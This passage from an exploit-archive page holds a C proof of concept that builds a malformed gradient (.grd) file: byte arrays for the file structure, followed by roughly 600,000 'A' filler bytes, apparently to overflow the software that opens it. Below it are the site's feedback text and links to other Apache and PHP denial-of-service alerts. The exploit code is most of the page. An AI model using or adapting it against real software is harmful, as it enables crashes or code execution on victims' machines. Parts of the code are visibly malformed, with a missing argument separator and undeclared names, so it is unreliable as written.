0x4F, 0x62, 0x6A, 0x63, 0x00, 0x00, 0x00, 0x09, 0x00, 0x47, 0x00, 0x72,
0x00, 0x61, 0x00, 0x64,
0x00, 0x69, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x47, 0x72,
0x64, 0x6E, 0x00, 0x00, 0x00, 0x01, 0x00 };

char gradif[] = {
0x00, 0x00, 0x00, 0x47, 0x72, 0x61, 0x64, 0x4F, 0x62, // 'SHPA!
0x6A, 0x63, 0x00, 0x00, 0x00, 0x09, 0x00, 0x47, 0x00, 0x72, 0x00, 0x61,
0x00, 0x64, 0x00, 0x69,
0x00, 0x65, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x47, 0x72, 0x64, 0x6E,
0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x00, 0x4E, 0x6D, 0x20, 0x20,
0x54, 0x45, 0x58, 0x54,
0x00, 0x00, 0x00, 0x31, 0x00, 0x24, 0x00, 0x24, 0x00, 0x24, 0x00, 0x2F,
0x00, 0x50, 0x00, 0x72,
0x00, 0x65, 0x00, 0x73, 0x00, 0x65, 0x00, 0x74, 0x00, 0x73, 0x00, 0x2F,
0x00, 0x47, 0x00, 0x72,
0x00, 0x61, 0x00, 0x64, 0x00, 0x69, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x74,
0x00, 0x73, 0x00, 0x2F,
0x00, 0x4E, 0x00, 0x6F, 0x00, 0x69, 0x00, 0x73, 0x00, 0x65, 0x00, 0x53,
0x00, 0x61, 0x00, 0x6D,
0x00, 0x70, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x73, 0x00, 0x5F, 0x00, 0x67,
0x00, 0x72, 0x00, 0x64,
0x00, 0x2F, 0x00, 0x52, 0x00, 0x65, 0x00, 0x64, 0x00, 0x73, 0x00, 0x3D,
0x00, 0x52, 0x00, 0x65,
0x00, 0x64, 0x00, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72,
0x64, 0x46, 0x65, 0x6E,
0x75, 0x6D, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x64, 0x46, 0x00, 0x00,
0x00, 0x00, 0x43, 0x6C,
0x4E, 0x73, 0x00, 0x00, 0x00, 0x00, 0x53, 0x68, 0x54, 0x72, 0x62, 0x6F,
0x6F, 0x6C, 0x00, 0x00,
0x00, 0x00, 0x00, 0x56, 0x63, 0x74, 0x43, 0x62, 0x6F, 0x6F, 0x6C, 0x00,
0x00, 0x00, 0x00, 0x00,
0x43, 0x6C, 0x72, 0x53, 0x65, 0x6E, 0x75, 0x6D, 0x00, 0x00, 0x00, 0x00,
0x43, 0x6C, 0x72, 0x53,
0x00, 0x00, 0x00, 0x00, 0x52, 0x47, 0x42, 0x43, 0x00, 0x00, 0x00, 0x00,
0x52, 0x6E, 0x64, 0x53,
0x6C, 0x6F, 0x6E, 0x67, 0x6D, 0x5F, 0x9F, 0x3C, 0x00, 0x00, 0x00, 0x00,
0x53, 0x6D, 0x74, 0x68,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x04, 0x7B, 0x00, 0x00, 0x00, 0x00,
0x4D, 0x6E, 0x6D, 0x20,
0x56, 0x6C, 0x4C, 0x73, 0x00, 0x00, 0x00, 0x04, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x00,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x00, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x00,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x4D, 0x78, 0x6D, 0x20,
0x56, 0x6C, 0x4C, 0x73, 0x00, 0x00, 0x00, 0x04, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x64,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x64, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x64,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x64, 0x4F, 0x62, 0x6A, 0x63,
0x00, 0x00, 0x00, 0x09,
0x00, 0x47, 0x00, 0x72, 0x00, 0x61, 0x00, 0x64, 0x00, 0x69, 0x00, 0x65,
0x00, 0x6E, 0x00, 0x74,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x64, 0x6E, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00,
0x00, 0x00, 0x47, 0x72, 0x61, 0x64, 0x4F, 0x62, 0x6A, 0x63, 0x00, 0x00,
0x00, 0x09, 0x00, 0x47,
0x00, 0x72, 0x00, 0x61, 0x00, 0x64, 0x00, 0x69, 0x00, 0x65, 0x00, 0x6E,
0x00, 0x74, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x64, 0x6E, 0x00, 0x00, 0x00, 0x09,
0x00, 0x00, 0x00, 0x00,
0x4E, 0x6D, 0x20, 0x20, 0x54, 0x45, 0x58, 0x54, 0x00, 0x00, 0x00, 0x37,
0x00, 0x24, 0x00, 0x24,
0x00, 0x24, 0x00, 0x2F, 0x00, 0x50, 0x00, 0x72, 0x00, 0x65, 0x00, 0x73,
0x00, 0x65, 0x00, 0x74,
0x00, 0x73, 0x00, 0x2F, 0x00, 0x47, 0x00, 0x72, 0x00, 0x61, 0x00, 0x64,
0x00, 0x69, 0x00, 0x65,
0x00, 0x6E, 0x00, 0x74, 0x00, 0x73, 0x00, 0x2F, 0x00, 0x4E, 0x00, 0x6F,
0x00, 0x69, 0x00, 0x73,
0x00, 0x65, 0x00, 0x53, 0x00, 0x61, 0x00, 0x6D, 0x00, 0x70, 0x00, 0x6C,
0x00, 0x65, 0x00, 0x73,
0x00, 0x5F, 0x00, 0x67, 0x00, 0x72, 0x00, 0x64, 0x00, 0x2F, 0x00, 0x50,
0x00, 0x61, 0x00, 0x73,
0x00, 0x74, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x73, 0x00, 0x3D, 0x00, 0x50,
0x00, 0x61, 0x00, 0x73,
0x00, 0x74, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x73, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x47, 0x72,
0x64, 0x46, 0x65, 0x6E, 0x75, 0x6D, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72,
0x64, 0x46, 0x00, 0x00,
0x00, 0x00, 0x43, 0x6C, 0x4E, 0x73, 0x00, 0x00, 0x00, 0x00, 0x53, 0x68,
0x54, 0x72, 0x62, 0x6F,
0x6F, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x56, 0x63, 0x74, 0x43, 0x62,
0x6F, 0x6F, 0x6C, 0x00,
0x00, 0x00, 0x00, 0x00, 0x43, 0x6C, 0x72, 0x53, 0x65, 0x6E, 0x75, 0x6D,
0x00, 0x00, 0x00, 0x00,
0x43, 0x6C, 0x72, 0x53, 0x00, 0x00, 0x00, 0x00, 0x52, 0x47, 0x42, 0x43,
0x00, 0x00, 0x00, 0x00,
0x52, 0x6E, 0x64, 0x53, 0x6C, 0x6F, 0x6E, 0x67, 0x0B, 0xF1, 0x65, 0x37,
0x00, 0x00, 0x00, 0x00,
0x53, 0x6D, 0x74, 0x68, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x04, 0x7B,
0x00, 0x00, 0x00, 0x00,
0x4D, 0x6E, 0x6D, 0x20, 0x56, 0x6C, 0x4C, 0x73, 0x00, 0x00, 0x00, 0x04,
0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x00, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x00,
0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x00, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x4D, 0x78, 0x6D, 0x20, 0x56, 0x6C, 0x4C, 0x73, 0x00, 0x00, 0x00, 0x04,
0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x64, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x64,
0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x64, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x64,
0x4F, 0x62, 0x6A, 0x63,
0x00, 0x00, 0x00, 0x09, 0x00, 0x47, 0x00, 0x72, 0x00, 0x61, 0x00, 0x64,
0x00, 0x69, 0x00, 0x65,
0x00, 0x6E, 0x00, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72,
0x64, 0x6E, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x61, 0x64, 0x4F, 0x62,
0x6A, 0x63, 0x00, 0x00,
0x00, 0x09, 0x00, 0x47, 0x00, 0x72, 0x00, 0x61, 0x00, 0x64, 0x00, 0x69,
0x00, 0x65, 0x00, 0x6E,
0x00, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x64, 0x6E,
0x00, 0x00, 0x00, 0x09,
0x00, 0x00, 0x00, 0x00, 0x4E, 0x6D, 0x20, 0x20, 0x54, 0x45, 0x58, 0x54,
0x00, 0x00, 0x00, 0x40,
0x00, 0x24, 0x00, 0x24, 0x00, 0x24, 0x00, 0x2F, 0x00, 0x50, 0x00, 0x72,
0x00, 0x65, 0x00, 0x73,
0x00, 0x65, 0x00, 0x74, 0x00, 0x73, 0x00, 0x2F, 0x00, 0x47, 0x00, 0x72,
0x00, 0x61, 0x00, 0x64,
0x00, 0x69, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x73, 0x00, 0x2F,
0x00, 0x4E, 0x00, 0x6F,
0x00, 0x69, 0x00, 0x73, 0x00, 0x65, 0x00, 0x53, 0x00, 0x61, 0x00, 0x6D,
0x00, 0x70, 0x00, 0x6C,
0x00, 0x65, 0x00, 0x73, 0x00, 0x5F, 0x00, 0x67, 0x00, 0x72, 0x00, 0x64,
0x00, 0x2F, 0x00, 0x55,
0x00, 0x6C, 0x00, 0x74, 0x00, 0x72, 0x00, 0x61, 0x00, 0x56, 0x00, 0x69,
0x00, 0x6F, 0x00, 0x6C,
0x00, 0x65, 0x00, 0x74, 0x00, 0x3D, 0x00, 0x55, 0x00, 0x6C, 0x00, 0x74,
0x00, 0x72, 0x00, 0x61,
0x00, 0x2D, 0x00, 0x56, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6C, 0x00, 0x65,
0x00, 0x74, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x64, 0x46, 0x65, 0x6E, 0x75, 0x6D,
0x00, 0x00, 0x00, 0x00,
0x47, 0x72, 0x64, 0x46, 0x00, 0x00, 0x00, 0x00, 0x43, 0x6C, 0x4E, 0x73,
0x00, 0x00, 0x00, 0x00,
0x53, 0x68, 0x54, 0x72, 0x62, 0x6F, 0x6F, 0x6C, 0x00, 0x00, 0x00, 0x00,
0x00, 0x56, 0x63, 0x74,
0x43, 0x62, 0x6F, 0x6F, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x6C,
0x72, 0x53, 0x65, 0x6E,
0x75, 0x6D, 0x00, 0x00, 0x00, 0x00, 0x43, 0x6C, 0x72, 0x53, 0x00, 0x00,
0x00, 0x00, 0x52, 0x47,
0x42, 0x43, 0x00, 0x00, 0x00, 0x00, 0x52, 0x6E, 0x64, 0x53, 0x6C, 0x6F,
0x6E, 0x67, 0x14, 0x03,
0xA7, 0xC9, 0x00, 0x00, 0x00, 0x00, 0x53, 0x6D, 0x74, 0x68, 0x6C, 0x6F,
0x6E, 0x67, 0x00, 0x00,
0x02, 0x3D, 0x00, 0x00, 0x00, 0x00, 0x4D, 0x6E, 0x6D, 0x20, 0x56, 0x6C,
0x4C, 0x73, 0x00, 0x00,
0x00, 0x04, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x00, 0x6C, 0x6F,
0x6E, 0x67, 0x00, 0x00,
0x00, 0x00, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x00, 0x6C, 0x6F,
0x6E, 0x67, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4D, 0x78, 0x6D, 0x20, 0x56, 0x6C,
0x4C, 0x73, 0x00, 0x00,
0x00, 0x04, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x64, 0x6C, 0x6F,
0x6E, 0x67, 0x00, 0x00,
0x00, 0x64, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x64, 0x6C, 0x6F,
0x6E, 0x67, 0x00, 0x00,
0x00, 0x64, 0x4F, 0x62, 0x6A, 0x63, 0x00, 0x00, 0x00, 0x09, 0x00, 0x47,
0x00, 0x72, 0x00, 0x61,
0x00, 0x64, 0x00, 0x69, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x47, 0x72, 0x64, 0x6E, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
0x47, 0x72, 0x61, 0x64,
0x4F, 0x62, 0x6A, 0x63, 0x00, 0x00, 0x00, 0x09, 0x00, 0x47, 0x00, 0x72,
0x00, 0x61, 0x00, 0x64,
0x00, 0x69, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x47, 0x72,
0x64, 0x6E, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x00, 0x4E, 0x6D,
0x20, 0x20, 0x54, 0x45,
0x58, 0x54, 0x00, 0x00, 0x00, 0x44, 0x00, 0x24, 0x00, 0x24, 0x00, 0x24,
0x00, 0x2F, 0x00, 0x50,
0x00, 0x72, 0x00, 0x65, 0x00, 0x73, 0x00, 0x65, 0x00, 0x74, 0x00, 0x73,
0x00, 0x2F, 0x00, 0x47,
0x00, 0x72, 0x00, 0x61, 0x00, 0x64, 0x00, 0x69, 0x00, 0x65, 0x00, 0x6E,
0x00, 0x74, 0x00, 0x73,
0x00, 0x2F, 0x00, 0x4E, 0x00, 0x6F, 0x00, 0x69, 0x00, 0x73, 0x00, 0x65,
0x00, 0x53, 0x00, 0x61,
0x00, 0x6D, 0x00, 0x70, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x73, 0x00, 0x5F,
0x00, 0x67, 0x00, 0x72,
0x00, 0x64, 0x00, 0x2F, 0x00, 0x4E, 0x00, 0x6F, 0x00, 0x69, 0x00, 0x73,
0x00, 0x79, 0x00, 0x53,
0x00, 0x70, 0x00, 0x65, 0x00, 0x63, 0x00, 0x74, 0x00, 0x72, 0x00, 0x75,
0x00, 0x6D, 0x00, 0x3D,
0x00, 0x4E, 0x00, 0x6F, 0x00, 0x69, 0x00, 0x73, 0x00, 0x79, 0x00, 0x20,
0x00, 0x53, 0x00, 0x70,
0x00, 0x65, 0x00, 0x63, 0x00, 0x74, 0x00, 0x72, 0x00, 0x75, 0x00, 0x6D,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x47, 0x72, 0x64, 0x46, 0x65, 0x6E, 0x75, 0x6D, 0x00, 0x00,
0x00, 0x00, 0x47, 0x72,
0x64, 0x46, 0x00, 0x00, 0x00, 0x00, 0x43, 0x6C, 0x4E, 0x73, 0x00, 0x00,
0x00, 0x00, 0x53, 0x68,
0x54, 0x72, 0x62, 0x6F, 0x6F, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x56,
0x63, 0x74, 0x43, 0x62,
0x6F, 0x6F, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x6C, 0x72, 0x53,
0x65, 0x6E, 0x75, 0x6D,
0x00, 0x00, 0x00, 0x00, 0x43, 0x6C, 0x72, 0x53, 0x00, 0x00, 0x00, 0x00,
0x52, 0x47, 0x42, 0x43,
0x00, 0x00, 0x00, 0x00, 0x52, 0x6E, 0x64, 0x53, 0x6C, 0x6F, 0x6E, 0x67,
0x79, 0x67, 0x76, 0x8A,
0x00, 0x00, 0x00, 0x00, 0x53, 0x6D, 0x74, 0x68, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x08, 0xF6,
0x00, 0x00, 0x00, 0x00, 0x4D, 0x6E, 0x6D, 0x20, 0x56, 0x6C, 0x4C, 0x73,
0x00, 0x00, 0x00, 0x04,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x00, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x00,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x00, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x4D, 0x78, 0x6D, 0x20, 0x56, 0x6C, 0x4C, 0x73,
0x00, 0x00, 0x00, 0x04,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x64, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x64,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x64, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x64,
0x4F, 0x62, 0x6A, 0x63, 0x00, 0x00, 0x00, 0x09, 0x00, 0x47, 0x00, 0x72,
0x00, 0x61, 0x00, 0x64,
0x00, 0x69, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x47, 0x72,
0x64, 0x6E, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72,
0x61, 0x64, 0x4F, 0x62,
0x6A, 0x63, 0x00, 0x00, 0x00, 0x09, 0x00, 0x47, 0x00, 0x72, 0x00, 0x61,
0x00, 0x64, 0x00, 0x69,
0x00, 0x65, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x47, 0x72, 0x64, 0x6E,
0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x00, 0x4E, 0x6D, 0x20, 0x20,
0x54, 0x45, 0x58, 0x54,
0x00, 0x00, 0x00, 0x4E, 0x00, 0x24, 0x00, 0x24, 0x00, 0x24, 0x00, 0x2F,
0x00, 0x50, 0x00, 0x72,
0x00, 0x65, 0x00, 0x73, 0x00, 0x65, 0x00, 0x74, 0x00, 0x73, 0x00, 0x2F,
0x00, 0x47, 0x00, 0x72,
0x00, 0x61, 0x00, 0x64, 0x00, 0x69, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x74,
0x00, 0x73, 0x00, 0x2F,
0x00, 0x4E, 0x00, 0x6F, 0x00, 0x69, 0x00, 0x73, 0x00, 0x65, 0x00, 0x53,
0x00, 0x61, 0x00, 0x6D,
0x00, 0x70, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x73, 0x00, 0x5F, 0x00, 0x67,
0x00, 0x72, 0x00, 0x64,
0x00, 0x2F, 0x00, 0x54, 0x00, 0x72, 0x00, 0x61, 0x00, 0x6E, 0x00, 0x73,
0x00, 0x70, 0x00, 0x61,
0x00, 0x72, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x50, 0x00, 0x61,
0x00, 0x73, 0x00, 0x74,
0x00, 0x65, 0x00, 0x6C, 0x00, 0x73, 0x00, 0x3D, 0x00, 0x54, 0x00, 0x72,
0x00, 0x61, 0x00, 0x6E,
0x00, 0x73, 0x00, 0x70, 0x00, 0x61, 0x00, 0x72, 0x00, 0x65, 0x00, 0x6E,
0x00, 0x74, 0x00, 0x20,
0x00, 0x50, 0x00, 0x61, 0x00, 0x73, 0x00, 0x74, 0x00, 0x65, 0x00, 0x6C,
0x00, 0x73, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x64, 0x46, 0x65, 0x6E, 0x75, 0x6D,
0x00, 0x00, 0x00, 0x00,
0x47, 0x72, 0x64, 0x46, 0x00, 0x00, 0x00, 0x00, 0x43, 0x6C, 0x4E, 0x73,
0x00, 0x00, 0x00, 0x00,
0x53, 0x68, 0x54, 0x72, 0x62, 0x6F, 0x6F, 0x6C, 0x01, 0x00, 0x00, 0x00,
0x00, 0x56, 0x63, 0x74,
0x43, 0x62, 0x6F, 0x6F, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x6C,
0x72, 0x53, 0x65, 0x6E,
0x75, 0x6D, 0x00, 0x00, 0x00, 0x00, 0x43, 0x6C, 0x72, 0x53, 0x00, 0x00,
0x00, 0x00, 0x52, 0x47,
0x42, 0x43, 0x00, 0x00, 0x00, 0x00, 0x52, 0x6E, 0x64, 0x53, 0x6C, 0x6F,
0x6E, 0x67, 0x05, 0xBF,
0x2A, 0x92, 0x00, 0x00, 0x00, 0x00, 0x53, 0x6D, 0x74, 0x68, 0x6C, 0x6F,
0x6E, 0x67, 0x00, 0x00,
0x08, 0xF6, 0x00, 0x00, 0x00, 0x00, 0x4D, 0x6E, 0x6D, 0x20, 0x56, 0x6C,
0x4C, 0x73, 0x00, 0x00,
0x00, 0x04, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x00, 0x6C, 0x6F,
0x6E, 0x67, 0x00, 0x00,
0x00, 0x00, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x00, 0x6C, 0x6F,
0x6E, 0x67, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4D, 0x78, 0x6D, 0x20, 0x56, 0x6C,
0x4C, 0x73, 0x00, 0x00,
0x00, 0x04, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x64, 0x6C, 0x6F,
0x6E, 0x67, 0x00, 0x00,
0x00, 0x64, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x64, 0x6C, 0x6F,
0x6E, 0x67, 0x00, 0x00,
0x00, 0x64 };

int main(int argc, char *argv[])
{
char sm[605764];
char zumazuma[601010];

memset(zumazuma,0x41,601010);

memcpy(sm,gradih,strlen(gradih));
memcpy(sm+strlen(gradih),zumazuma,strlen(zumazuma));
memcpy(sm+strlen(gradih)+strlen(zumazuma)+gradif,strlen(gradif));

pf = fopen(NAMEFILE,"wb");

if(pf==NULL)
{
perror ("Oops! Can't open file.\n");
}

fwrite(sm,1,sizeof(sm),pf);

fclose(pf);

sleep(1);

printf("\nDone!\n");

return 0;
}

15





Arrow  Feedback :

If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.